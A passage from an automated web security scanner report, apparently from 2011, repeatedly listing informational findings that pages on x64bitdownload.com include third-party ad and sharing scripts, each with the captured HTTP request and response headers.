                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1337. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-explorer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1338. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1339. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1340. http://www.x64bitdownload.com/64-bit-feed-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1341. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1342. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1343. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1344. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-firefox-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1345. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1346. http://www.x64bitdownload.com/64-bit-forum-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1347. http://www.x64bitdownload.com/64-bit-forums-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1348. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-google-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1349. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1350. http://www.x64bitdownload.com/64-bit-group-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
